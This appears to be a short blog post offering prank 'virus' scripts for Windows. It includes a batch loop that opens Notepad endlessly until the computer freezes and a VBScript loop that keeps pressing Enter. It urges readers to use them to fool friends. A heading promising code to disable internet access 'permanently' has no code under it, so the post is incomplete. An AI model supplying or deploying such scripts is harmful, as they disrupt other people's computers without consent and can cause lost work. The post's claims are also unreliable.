How To Create Computer Virus In Less Than 60 Seconds
#1 Disable Internet Permanently
The below code will disable anyone’s internet connectivity PERMANENTLY.
#2 Endless Notepads
The below code will pop up endless notepads until the computer freezes and crashes!
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
#3 Endless Enter
The below code will make the enter button pressed continuously
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
So this is all about How To Create a Virus in Less Than 60 seconds. By this method, you can easily create the harmful and harmless virus and can make your friends fool. If you have some more tricks like this, you can share with us. Hope you like the post! Don’t forget to share this cool post with your friends.
Comments
Post a Comment